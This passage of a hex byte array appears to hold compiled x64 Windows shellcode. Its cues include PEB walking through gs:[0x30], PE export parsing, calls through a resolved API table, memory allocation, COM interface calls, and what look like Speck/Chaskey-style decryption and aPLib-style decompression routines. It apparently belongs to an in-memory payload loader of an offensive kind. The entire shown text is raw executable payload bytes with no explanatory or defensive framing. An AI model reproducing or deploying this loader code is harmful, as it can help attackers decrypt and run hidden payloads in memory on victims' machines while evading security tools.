647 0x50, 0x48, 0x81, 0xc4, 0x58, 0x02, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e,
648 0x41, 0x5d, 0x41, 0x5c, 0x5f, 0x5e, 0x5d, 0x5b, 0xc3, 0xcc, 0xcc, 0xcc,
649 0x48, 0x89, 0x5c, 0x24, 0x10, 0x48, 0x89, 0x74, 0x24, 0x20, 0x55, 0x57,
650 0x41, 0x56, 0x48, 0x8d, 0xac, 0x24, 0xc0, 0xfc, 0xff, 0xff, 0x48, 0x81,
651 0xec, 0x40, 0x04, 0x00, 0x00, 0x48, 0x8b, 0xda, 0x48, 0x8b, 0xf1, 0x48,
652 0x8b, 0x91, 0x18, 0x09, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00,
653 0x33, 0xc9, 0x48, 0x8d, 0x14, 0x55, 0x02, 0x00, 0x00, 0x00, 0x44, 0x8d,
654 0x49, 0x04, 0xff, 0x56, 0x48, 0x4c, 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x0f,
655 0x84, 0x94, 0x02, 0x00, 0x00, 0x8b, 0x8b, 0x24, 0x05, 0x00, 0x00, 0x4c,
656 0x8d, 0x83, 0x28, 0x05, 0x00, 0x00, 0x03, 0xc9, 0x83, 0xcb, 0xff, 0x89,
657 0x4c, 0x24, 0x28, 0x44, 0x8b, 0xcb, 0x33, 0xc9, 0x48, 0x89, 0x44, 0x24,
658 0x20, 0x33, 0xd2, 0xff, 0x56, 0x70, 0x83, 0x65, 0xe8, 0x00, 0x48, 0x8d,
659 0x45, 0x80, 0x83, 0x65, 0xf8, 0x00, 0x48, 0x8d, 0x55, 0x08, 0x48, 0x89,
660 0x45, 0xe0, 0x48, 0x8b, 0xce, 0x48, 0x8d, 0x05, 0x94, 0xe3, 0xff, 0xff,
661 0x48, 0x89, 0x75, 0x38, 0x48, 0x89, 0x45, 0x80, 0x48, 0x8d, 0x05, 0x19,
662 0xe2, 0xff, 0xff, 0x48, 0x89, 0x45, 0x88, 0x48, 0x8d, 0x05, 0x76, 0xe2,
663 0xff, 0xff, 0x48, 0x89, 0x45, 0x90, 0x48, 0x8d, 0x05, 0xf3, 0xe2, 0xff,
664 0xff, 0x48, 0x89, 0x45, 0x98, 0x48, 0x8d, 0x05, 0x70, 0xe2, 0xff, 0xff,
665 0x48, 0x89, 0x45, 0xa0, 0x48, 0x8d, 0x05, 0x61, 0xe2, 0xff, 0xff, 0x48,
666 0x89, 0x45, 0xa8, 0x48, 0x8d, 0x05, 0x56, 0xe2, 0xff, 0xff, 0x48, 0x89,
667 0x45, 0xb0, 0x48, 0x8d, 0x05, 0x4b, 0xe2, 0xff, 0xff, 0x48, 0x89, 0x45,
668 0xb8, 0x48, 0x8d, 0x05, 0xd8, 0xe2, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc0,
669 0x48, 0x8d, 0x05, 0x35, 0xe2, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc8, 0x48,
670 0x8d, 0x05, 0x2a, 0xe2, 0xff, 0xff, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x8d,
671 0x44, 0x24, 0x50, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8d, 0x05, 0xb2, 0xe1,
672 0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x50, 0x48, 0x8d, 0x05, 0x96, 0xe1,
673 0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x58, 0x48, 0x8d, 0x05, 0xf2, 0xe1,
674 0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x60, 0x48, 0x8d, 0x05, 0x86, 0xe1,
675 0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x68, 0x48, 0x8d, 0x05, 0x7a, 0xe1,
676 0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x70, 0x48, 0x8d, 0x45, 0x40, 0x48,
677 0x89, 0x45, 0x08, 0x48, 0x89, 0x75, 0x00, 0xe8, 0x9c, 0xeb, 0xff, 0xff,
678 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x96, 0x48, 0x01, 0x00, 0x00, 0x85, 0xc0,
679 0x0f, 0x85, 0x4c, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x60, 0x03, 0x00,
680 0x00, 0x33, 0xd2, 0x4c, 0x8d, 0x8e, 0x94, 0x06, 0x00, 0x00, 0x48, 0x89,
681 0x44, 0x24, 0x20, 0x48, 0x8d, 0x8e, 0x74, 0x06, 0x00, 0x00, 0x44, 0x8d,
682 0x43, 0x04, 0xff, 0x96, 0x50, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85,
683 0x1e, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x60, 0x03, 0x00, 0x00, 0x48,
684 0x8d, 0x96, 0xd4, 0x06, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x70, 0x03, 0x00,
685 0x00, 0x48, 0x8b, 0x01, 0xff, 0x10, 0x85, 0xc0, 0x0f, 0x85, 0xe2, 0x00,
686 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x01,
687 0xff, 0x50, 0x18, 0x85, 0xc0, 0x0f, 0x85, 0xc0, 0x00, 0x00, 0x00, 0x48,
688 0x8b, 0x8d, 0x60, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xe0, 0x48, 0x89,
689 0x4d, 0x20, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x18, 0x85, 0xc0, 0x0f, 0x85,
690 0xa3, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x30, 0x01, 0x00, 0x00, 0xc7,
691 0x44, 0x24, 0x28, 0x00, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x86, 0xe0, 0x05,
692 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0x44, 0x8b, 0xcb, 0x33, 0xd2,
693 0x33, 0xc9, 0xff, 0x56, 0x70, 0x48, 0x8d, 0x8d, 0x30, 0x01, 0x00, 0x00,
694 0xff, 0x96, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x60, 0x03, 0x00,
695 0x00, 0x44, 0x8d, 0x43, 0x03, 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xf8, 0x4c,
696 0x8b, 0x09, 0x41, 0xff, 0x51, 0x40, 0x48, 0x8b, 0xcf, 0x8b, 0xd8, 0xff,
697 0x96, 0xe0, 0x00, 0x00, 0x00, 0x85, 0xdb, 0x75, 0x4a, 0x48, 0x83, 0x64,
698 0x24, 0x48, 0x00, 0x45, 0x33, 0xc9, 0x48, 0x83, 0x64, 0x24, 0x40, 0x00,
699 0x45, 0x33, 0xc0, 0x21, 0x5c, 0x24, 0x38, 0x49, 0x8b, 0xd6, 0x48, 0x8b,
700 0x8d, 0x70, 0x03, 0x00, 0x00, 0x21, 0x5c, 0x24, 0x30, 0x48, 0x83, 0x64,
701 0x24, 0x28, 0x00, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x48, 0x8b, 0x01,
702 0xff, 0x50, 0x28, 0x85, 0xc0, 0x75, 0x10, 0x48, 0x8b, 0x8d, 0x60, 0x03,
703 0x00, 0x00, 0x8d, 0x53, 0x02, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x28, 0x48,
704 0x8b, 0x8d, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x10,
705 0x48, 0x8b, 0x8d, 0x60, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x01, 0xff, 0x50,
706 0x38, 0x48, 0x8b, 0x8d, 0x60, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x01, 0xff,
707 0x50, 0x10, 0x44, 0x8b, 0x86, 0x18, 0x09, 0x00, 0x00, 0x33, 0xd2, 0x49,
708 0x8b, 0xce, 0x46, 0x8d, 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0xe8, 0x41,
709 0x08, 0x00, 0x00, 0x33, 0xd2, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0x49,
710 0x8b, 0xce, 0xff, 0x56, 0x50, 0x4c, 0x8d, 0x9c, 0x24, 0x40, 0x04, 0x00,
711 0x00, 0x49, 0x8b, 0x5b, 0x28, 0x49, 0x8b, 0x73, 0x38, 0x49, 0x8b, 0xe3,
712 0x41, 0x5e, 0x5f, 0x5d, 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,
713 0x18, 0x48, 0x89, 0x54, 0x24, 0x10, 0x55, 0x56, 0x57, 0x41, 0x54, 0x41,
714 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81, 0xec, 0xb0, 0x00, 0x00, 0x00,
715 0x65, 0x48, 0x8b, 0x04, 0x25, 0x30, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xf1,
716 0x48, 0x81, 0xc1, 0x4c, 0x03, 0x00, 0x00, 0x4c, 0x8b, 0x68, 0x60, 0x4d,
717 0x8b, 0x65, 0x20, 0x4c, 0x89, 0xa4, 0x24, 0xf0, 0x00, 0x00, 0x00, 0xff,
718 0x56, 0x40, 0x33, 0xc9, 0x4c, 0x8b, 0xd8, 0x4c, 0x63, 0x48, 0x3c, 0x4c,
719 0x03, 0xc8, 0x45, 0x0f, 0xb7, 0x51, 0x14, 0x45, 0x0f, 0xb7, 0x41, 0x06,
720 0x4d, 0x03, 0xd1, 0x45, 0x85, 0xc0, 0x74, 0x19, 0x44, 0x8b, 0x8e, 0x44,
721 0x03, 0x00, 0x00, 0x48, 0x8d, 0x04, 0x89, 0x45, 0x39, 0x4c, 0xc2, 0x18,
722 0x74, 0x73, 0xff, 0xc1, 0x41, 0x3b, 0xc8, 0x72, 0xee, 0x8b, 0x9c, 0x24,
723 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xbc, 0x24, 0xf0, 0x00, 0x00, 0x00,
724 0x33, 0xed, 0x85, 0xdb, 0x74, 0x3a, 0x4c, 0x8b, 0xf7, 0x49, 0x8b, 0x56,
725 0x08, 0x48, 0x8b, 0xce, 0xe8, 0xeb, 0xec, 0xff, 0xff, 0x85, 0xc0, 0x74,
726 0x1d, 0x41, 0xb0, 0x01, 0x49, 0x8d, 0x4c, 0x24, 0x70, 0x49, 0x8b, 0xd6,
727 0xff, 0x96, 0x60, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x45, 0x4c, 0x8b,
728 0xa4, 0x24, 0xf0, 0x00, 0x00, 0x00, 0xff, 0xc5, 0x49, 0x83, 0xc6, 0x08,
729 0x3b, 0xeb, 0x72, 0xc9, 0x33, 0xc0, 0x48, 0x8b, 0x9c, 0x24, 0x00, 0x01,
730 0x00, 0x00, 0x48, 0x81, 0xc4, 0xb0, 0x00, 0x00, 0x00, 0x41, 0x5f, 0x41,
731 0x5e, 0x41, 0x5d, 0x41, 0x5c, 0x5f, 0x5e, 0x5d, 0xc3, 0x48, 0x8d, 0x04,
732 0x89, 0x41, 0x8b, 0x7c, 0xc2, 0x24, 0x41, 0x8b, 0x5c, 0xc2, 0x20, 0x49,
733 0x03, 0xfb, 0xc1, 0xeb, 0x03, 0xeb, 0x8d, 0x41, 0xb0, 0x01, 0x49, 0x8d,
734 0x54, 0x24, 0x70, 0x48, 0x8d, 0x4c, 0x24, 0x20, 0xff, 0x96, 0x70, 0x01,
735 0x00, 0x00, 0x48, 0x8b, 0x94, 0x24, 0xf8, 0x00, 0x00, 0x00, 0x49, 0x8b,
736 0xce, 0xff, 0x96, 0x90, 0x01, 0x00, 0x00, 0x33, 0xed, 0x4c, 0x8b, 0xff,
737 0x49, 0x8b, 0x57, 0x08, 0x48, 0x8b, 0xce, 0xe8, 0x58, 0xec, 0xff, 0xff,
738 0x85, 0xc0, 0x74, 0x15, 0x41, 0xb0, 0x01, 0x48, 0x8d, 0x4c, 0x24, 0x20,
739 0x49, 0x8b, 0xd7, 0xff, 0x96, 0x68, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x75,
740 0x13, 0x41, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x49, 0x83, 0xc7, 0x08, 0x41,
741 0x03, 0xe9, 0x3b, 0xeb, 0x73, 0x2d, 0xeb, 0xc8, 0x41, 0xb0, 0x01, 0x48,
742 0x8d, 0x4c, 0x24, 0x20, 0x49, 0x8b, 0xd6, 0xff, 0x96, 0x70, 0x01, 0x00,
743 0x00, 0x48, 0x8d, 0x0c, 0xef, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48,
744 0x8d, 0x54, 0x24, 0x20, 0xe8, 0x77, 0x06, 0x00, 0x00, 0x41, 0xb9, 0x01,
745 0x00, 0x00, 0x00, 0x49, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x78, 0x10, 0xe9,
746 0xdb, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0xbe, 0x6c, 0x03, 0x00, 0x00, 0x41,
747 0x8a, 0x0f, 0x33, 0xed, 0x33, 0xd2, 0x45, 0x8b, 0xe1, 0x84, 0xc9, 0x0f,
748 0x84, 0xbf, 0x00, 0x00, 0x00, 0x45, 0x33, 0xc0, 0x80, 0xf9, 0x3b, 0x74,
749 0x2e, 0x81, 0xfa, 0x80, 0x00, 0x00, 0x00, 0x73, 0x26, 0x33, 0xc0, 0x42,
750 0x88, 0x4c, 0x04, 0x30, 0x80, 0xf9, 0x77, 0x41, 0x0f, 0x45, 0xc4, 0x80,
751 0xf9, 0x70, 0x44, 0x8b, 0xe0, 0x41, 0x0f, 0x44, 0xe9, 0x41, 0x03, 0xd1,
752 0x44, 0x8b, 0xc2, 0x42, 0x8a, 0x0c, 0x3a, 0x84, 0xc9, 0x75, 0xcd, 0x85,
753 0xd2, 0x0f, 0x84, 0x81, 0x00, 0x00, 0x00, 0x8d, 0x4a, 0x01, 0xc6, 0x44,
754 0x14, 0x30, 0x00, 0x4c, 0x03, 0xf9, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x48,
755 0x8b, 0x4f, 0x30, 0xff, 0x56, 0x38, 0x48, 0x8b, 0xd8, 0x41, 0xb9, 0x01,
756 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x8b, 0x45, 0x85, 0xe4, 0x74,
757 0x29, 0x85, 0xed, 0x74, 0x05, 0xff, 0xd3, 0x48, 0x8b, 0xd8, 0x41, 0xb9,
758 0x01, 0x00, 0x00, 0x00, 0x48, 0x85, 0xdb, 0x0f, 0x84, 0x6e, 0xff, 0xff,
759 0xff, 0x48, 0x83, 0x3b, 0x00, 0x0f, 0x84, 0x64, 0xff, 0xff, 0xff, 0x48,
760 0x8b, 0x44, 0x24, 0x28, 0xeb, 0x26, 0x85, 0xed, 0x74, 0x05, 0xff, 0xd3,
761 0x48, 0x8b, 0xd8, 0x41, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x48, 0x85, 0xdb,
762 0x0f, 0x84, 0x45, 0xff, 0xff, 0xff, 0x48, 0x83, 0x3b, 0x00, 0x0f, 0x84,
763 0x3b, 0xff, 0xff, 0xff, 0x49, 0x8b, 0x46, 0x08, 0x48, 0x89, 0x03, 0xe9,
764 0x2f, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x3f, 0x48, 0x83, 0x7f, 0x30, 0x00,
765 0x0f, 0x85, 0x1a, 0xff, 0xff, 0xff, 0x41, 0x8b, 0xc1, 0xe9, 0x48, 0xfe,
766 0xff, 0xff, 0xcc, 0xcc, 0x41, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x33,
767 0xc0, 0xc3, 0xcc, 0xcc, 0x2b, 0xca, 0x8b, 0xc1, 0xc3, 0xcc, 0xcc, 0xcc,
768 0x44, 0x8b, 0xc2, 0x8b, 0xc1, 0x99, 0x41, 0xf7, 0xf8, 0xc3, 0xcc, 0xcc,
769 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x6c, 0x24, 0x10, 0x48, 0x89,
770 0x74, 0x24, 0x18, 0x57, 0x48, 0x83, 0xec, 0x20, 0x65, 0x48, 0x8b, 0x04,
771 0x25, 0x30, 0x00, 0x00, 0x00, 0x49, 0x8b, 0xf8, 0x48, 0x8b, 0xf2, 0x48,
772 0x8b, 0xe9, 0x45, 0x33, 0xd2, 0x4c, 0x8b, 0x48, 0x60, 0x49, 0x8b, 0x41,
773 0x18, 0x48, 0x8b, 0x58, 0x10, 0xeb, 0x1c, 0x4d, 0x85, 0xd2, 0x75, 0x20,
774 0x4c, 0x8b, 0xcf, 0x4c, 0x8b, 0xc6, 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xcd,
775 0xe8, 0xc3, 0xe3, 0xff, 0xff, 0x48, 0x8b, 0x1b, 0x4c, 0x8b, 0xd0, 0x48,
776 0x8b, 0x43, 0x30, 0x48, 0x85, 0xc0, 0x75, 0xdb, 0x48, 0x8b, 0x5c, 0x24,
777 0x30, 0x49, 0x8b, 0xc2, 0x48, 0x8b, 0x6c, 0x24, 0x38, 0x48, 0x8b, 0x74,
778 0x24, 0x40, 0x48, 0x83, 0xc4, 0x20, 0x5f, 0xc3, 0x48, 0x89, 0x5c, 0x24,
779 0x08, 0x48, 0x89, 0x6c, 0x24, 0x10, 0x48, 0x89, 0x74, 0x24, 0x18, 0x57,
780 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xec, 0x30, 0x33, 0xff, 0x33, 0xed,
781 0x45, 0x33, 0xf6, 0x48, 0x8b, 0xf2, 0x4c, 0x8b, 0xf9, 0x42, 0x8a, 0x54,
782 0x3d, 0x00, 0x84, 0xd2, 0x74, 0x11, 0x83, 0xfd, 0x40, 0x74, 0x0c, 0x8b,
783 0xc7, 0xff, 0xc7, 0xff, 0xc5, 0x88, 0x54, 0x04, 0x20, 0xeb, 0x56, 0x8b,
784 0xc7, 0x48, 0x8d, 0x5c, 0x24, 0x20, 0x48, 0x03, 0xd8, 0x41, 0xb8, 0x10,
785 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0x44, 0x2b, 0xc7, 0x33, 0xd2, 0xe8,
786 0xa4, 0x04, 0x00, 0x00, 0xc6, 0x03, 0x80, 0x83, 0xff, 0x0c, 0x72, 0x20,
787 0x48, 0x8b, 0xd6, 0x48, 0x8d, 0x4c, 0x24, 0x20, 0xe8, 0x63, 0x00, 0x00,
788 0x00, 0x33, 0xd2, 0x48, 0x8d, 0x4c, 0x24, 0x20, 0x48, 0x33, 0xf0, 0x44,
789 0x8d, 0x42, 0x10, 0xe8, 0x7c, 0x04, 0x00, 0x00, 0x8b, 0xc5, 0xbf, 0x10,
790 0x00, 0x00, 0x00, 0xc1, 0xe0, 0x03, 0x89, 0x44, 0x24, 0x2c, 0x41, 0xff,
791 0xc6, 0x83, 0xff, 0x10, 0x75, 0x12, 0x48, 0x8b, 0xd6, 0x48, 0x8d, 0x4c,
792 0x24, 0x20, 0xe8, 0x2d, 0x00, 0x00, 0x00, 0x48, 0x33, 0xf0, 0x33, 0xff,
793 0x45, 0x85, 0xf6, 0x0f, 0x84, 0x70, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x5c,
794 0x24, 0x50, 0x48, 0x8b, 0xc6, 0x48, 0x8b, 0x74, 0x24, 0x60, 0x48, 0x8b,
795 0x6c, 0x24, 0x58, 0x48, 0x83, 0xc4, 0x30, 0x41, 0x5f, 0x41, 0x5e, 0x5f,
796 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x53, 0x48, 0x83, 0xec, 0x10,
797 0x0f, 0x10, 0x01, 0x48, 0x89, 0x50, 0x10, 0x8b, 0xca, 0x44, 0x8b, 0x40,
798 0x14, 0x45, 0x33, 0xd2, 0x0f, 0x11, 0x04, 0x24, 0x8b, 0x50, 0xf4, 0x44,
799 0x8b, 0x58, 0xf0, 0x8b, 0x58, 0xec, 0x44, 0x8b, 0x0c, 0x24, 0x8b, 0xc2,
800 0xc1, 0xc9, 0x08, 0x41, 0x03, 0xc8, 0x8b, 0xd3, 0x41, 0x33, 0xc9, 0xc1,
801 0xca, 0x08, 0x41, 0x03, 0xd1, 0x41, 0xc1, 0xc0, 0x03, 0x41, 0x33, 0xd2,
802 0x41, 0xc1, 0xc1, 0x03, 0x44, 0x33, 0xca, 0x44, 0x33, 0xc1, 0x41, 0xff,
803 0xc2, 0x41, 0x8b, 0xdb, 0x44, 0x8b, 0xd8, 0x41, 0x83, 0xfa, 0x1b, 0x72,
804 0xcd, 0x89, 0x4c, 0x24, 0x28, 0x44, 0x89, 0x44, 0x24, 0x2c, 0x48, 0x8b,
805 0x44, 0x24, 0x28, 0x48, 0x83, 0xc4, 0x10, 0x5b, 0xc3, 0xcc, 0xcc, 0xcc,
806 0x45, 0x85, 0xc9, 0x0f, 0x84, 0x10, 0x01, 0x00, 0x00, 0x48, 0x89, 0x5c,
807 0x24, 0x08, 0x48, 0x89, 0x7c, 0x24, 0x10, 0x4c, 0x89, 0x74, 0x24, 0x18,
808 0x55, 0x48, 0x8b, 0xec, 0x48, 0x83, 0xec, 0x10, 0x4c, 0x8b, 0xd1, 0x48,
809 0x8d, 0x45, 0xf0, 0x4c, 0x2b, 0xd0, 0x4d, 0x8b, 0xd8, 0x48, 0x8b, 0xfa,
810 0x41, 0xbe, 0x10, 0x00, 0x00, 0x00, 0x0f, 0x10, 0x07, 0x48, 0x8d, 0x4d,
811 0xf0, 0xba, 0x04, 0x00, 0x00, 0x00, 0xf3, 0x0f, 0x7f, 0x45, 0xf0, 0x41,
812 0x8b, 0x04, 0x0a, 0x31, 0x01, 0x48, 0x8d, 0x49, 0x04, 0x48, 0x83, 0xea,
813 0x01, 0x75, 0xf0, 0x8b, 0x55, 0xfc, 0x49, 0x8b, 0xde, 0x8b, 0x45, 0xf8,
814 0x44, 0x8b, 0x45, 0xf4, 0x8b, 0x4d, 0xf0, 0x41, 0x03, 0xc8, 0x03, 0xc2,
815 0x41, 0xc1, 0xc0, 0x05, 0x44, 0x33, 0xc1, 0xc1, 0xc2, 0x08, 0x33, 0xd0,
816 0xc1, 0xc1, 0x10, 0x41, 0x03, 0xc0, 0x03, 0xca, 0x41, 0xc1, 0xc0, 0x07,
817 0xc1, 0xc2, 0x0d, 0x44, 0x33, 0xc0, 0x33, 0xd1, 0xc1, 0xc0, 0x10, 0x48,
818 0x83, 0xeb, 0x01, 0x75, 0xd2, 0x89, 0x55, 0xfc, 0x8d, 0x53, 0x04, 0x89,
819 0x4d, 0xf0, 0x48, 0x8d, 0x4d, 0xf0, 0x44, 0x89, 0x45, 0xf4, 0x89, 0x45,
820 0xf8, 0x42, 0x8b, 0x04, 0x11, 0x31, 0x01, 0x48, 0x8d, 0x49, 0x04, 0x48,
821 0x83, 0xea, 0x01, 0x75, 0xf0, 0x45, 0x3b, 0xce, 0x41, 0x8b, 0xc9, 0x41,
822 0x0f, 0x47, 0xce, 0x85, 0xc9, 0x74, 0x1b, 0x4c, 0x8d, 0x45, 0xf0, 0x8b,
823 0xd9, 0x4d, 0x2b, 0xc3, 0x49, 0x8b, 0xd3, 0x41, 0x8a, 0x04, 0x10, 0x30,
824 0x02, 0x48, 0xff, 0xc2, 0x48, 0x83, 0xeb, 0x01, 0x75, 0xf1, 0x44, 0x2b,
825 0xc9, 0x8b, 0xc1, 0x4c, 0x03, 0xd8, 0x41, 0x8b, 0xd6, 0x8d, 0x42, 0xff,
826 0x80, 0x04, 0x38, 0x01, 0x75, 0x06, 0xff, 0xca, 0x85, 0xd2, 0x7f, 0xf1,
827 0x45, 0x85, 0xc9, 0x0f, 0x85, 0x31, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x5c,
828 0x24, 0x20, 0x48, 0x8b, 0x7c, 0x24, 0x28, 0x4c, 0x8b, 0x74, 0x24, 0x30,
829 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x48,
830 0x89, 0x58, 0x08, 0x48, 0x89, 0x70, 0x10, 0x48, 0x89, 0x78, 0x18, 0x4c,
831 0x89, 0x70, 0x20, 0x55, 0x48, 0x8b, 0xec, 0x48, 0x83, 0xec, 0x40, 0x8a,
832 0x01, 0x41, 0x83, 0xce, 0xff, 0x83, 0x65, 0xf4, 0x00, 0x45, 0x33, 0xc9,
833 0x88, 0x02, 0x33, 0xff, 0x48, 0x8d, 0x42, 0x01, 0x48, 0x8b, 0xda, 0x48,
834 0x89, 0x45, 0xe8, 0x45, 0x8b, 0xde, 0x48, 0x8d, 0x41, 0x01, 0x48, 0x89,
835 0x45, 0xe0, 0x8d, 0x77, 0x01, 0x48, 0x8d, 0x4d, 0xe0, 0xe8, 0xf6, 0x01,
836 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xaa, 0x01, 0x00, 0x00, 0x48, 0x8d,
837 0x4d, 0xe0, 0xe8, 0xe5, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x9f,
838 0x00, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0xe0, 0xe8, 0xd4, 0x01, 0x00, 0x00,
839 0x85, 0xc0, 0x74, 0x4e, 0x45, 0x33, 0xc9, 0x45, 0x8d, 0x51, 0x04, 0x48,
840 0x8d, 0x4d, 0xe0, 0xe8, 0xc0, 0x01, 0x00, 0x00, 0x46, 0x8d, 0x0c, 0x48,
841 0x44, 0x2b, 0xd6, 0x75, 0xee, 0x45, 0x85, 0xc9, 0x74, 0x1d, 0x48, 0x8b,
842 0x55, 0xe8, 0x48, 0x8b, 0xc2, 0x41, 0x8b, 0xc9, 0x48, 0x2b, 0xc1, 0x8a,
843 0x00, 0x88, 0x02, 0x48, 0x03, 0xd6, 0x48, 0x89, 0x55, 0xe8, 0xe9, 0x6b,
844 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0xc6, 0x00, 0x00, 0x48, 0x03,
845 0xc6, 0x48, 0x89, 0x45, 0xe8, 0xe9, 0x58, 0x01, 0x00, 0x00, 0x48, 0x8b,
846 0x45, 0xe0, 0x44, 0x0f, 0xb6, 0x18, 0x48, 0x03, 0xc6, 0x41, 0x8b, 0xcb,
847 0x48, 0x89, 0x45, 0xe0, 0x23, 0xce, 0x83, 0xc1, 0x02, 0x41, 0xd1, 0xeb,
848 0x74, 0x21, 0x48, 0x8b, 0x55, 0xe8, 0x45, 0x8b, 0xc3, 0x49, 0xf7, 0xd8,
849 0x41, 0x8a, 0x04, 0x10, 0x88, 0x02, 0x48, 0x03, 0xd6, 0x41, 0x03, 0xce,
850 0x75, 0xf2, 0x48, 0x89, 0x55, 0xe8, 0xe9, 0xfc, 0x00, 0x00, 0x00, 0x8b,
851 0xfe, 0xe9, 0xf5, 0x00, 0x00, 0x00, 0x44, 0x8b, 0xd6, 0x48, 0x8d, 0x4d,
852 0xe0, 0xe8, 0x32, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0xe0, 0x46, 0x8d,
853 0x14, 0x50, 0xe8, 0x25, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x75, 0xe6, 0x45,
854 0x85, 0xc9, 0x75, 0x48, 0x41, 0x83, 0xfa, 0x02, 0x75, 0x42, 0x44, 0x8b,
855 0xce, 0x48, 0x8d, 0x4d, 0xe0, 0xe8, 0x0a, 0x01, 0x00, 0x00, 0x48, 0x8d,
856 0x4d, 0xe0, 0x46, 0x8d, 0x0c, 0x48, 0xe8, 0xfd, 0x00, 0x00, 0x00, 0x85,
857 0xc0, 0x75, 0xe6, 0x45, 0x85, 0xc9, 0x0f, 0x84, 0xa7, 0x00, 0x00, 0x00,
858 0x48, 0x8b, 0x4d, 0xe8, 0x41, 0x8b, 0xd3, 0x48, 0xf7, 0xda, 0x8a, 0x04,
859 0x0a, 0x88, 0x01, 0x48, 0x03, 0xce, 0x45, 0x03, 0xce, 0x75, 0xf3, 0xe9,
860 0x87, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xe0, 0x44, 0x33, 0xce, 0x45,
861 0x2b, 0xd1, 0x44, 0x8b, 0xce, 0x41, 0xc1, 0xe2, 0x08, 0x44, 0x0f, 0xb6,
862 0x19, 0x41, 0x81, 0xc3, 0x00, 0xfe, 0xff, 0xff, 0x45, 0x03, 0xda, 0x48,
863 0x03, 0xce, 0x48, 0x89, 0x4d, 0xe0, 0x48, 0x8d, 0x4d, 0xe0, 0xe8, 0xa5,
864 0x00, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0xe0, 0x46, 0x8d, 0x0c, 0x48, 0xe8,
865 0x98, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0xe6, 0x41, 0x81, 0xfb, 0x00,
866 0x7d, 0x00, 0x00, 0x41, 0x8d, 0x41, 0x01, 0x41, 0x0f, 0x42, 0xc1, 0x41,
867 0x81, 0xfb, 0x00, 0x05, 0x00, 0x00, 0x8d, 0x48, 0x01, 0x0f, 0x42, 0xc8,
868 0x41, 0x81, 0xfb, 0x80, 0x00, 0x00, 0x00, 0x44, 0x8d, 0x41, 0x02, 0x44,
869 0x0f, 0x43, 0xc1, 0x45, 0x85, 0xc0, 0x74, 0x1b, 0x48, 0x8b, 0x4d, 0xe8,
870 0x41, 0x8b, 0xd3, 0x48, 0xf7, 0xda, 0x8a, 0x04, 0x0a, 0x88, 0x01, 0x48,
871 0x03, 0xce, 0x45, 0x03, 0xc6, 0x75, 0xf3, 0x48, 0x89, 0x4d, 0xe8, 0x44,
872 0x8b, 0xce, 0xeb, 0x1d, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x4d, 0xe8,
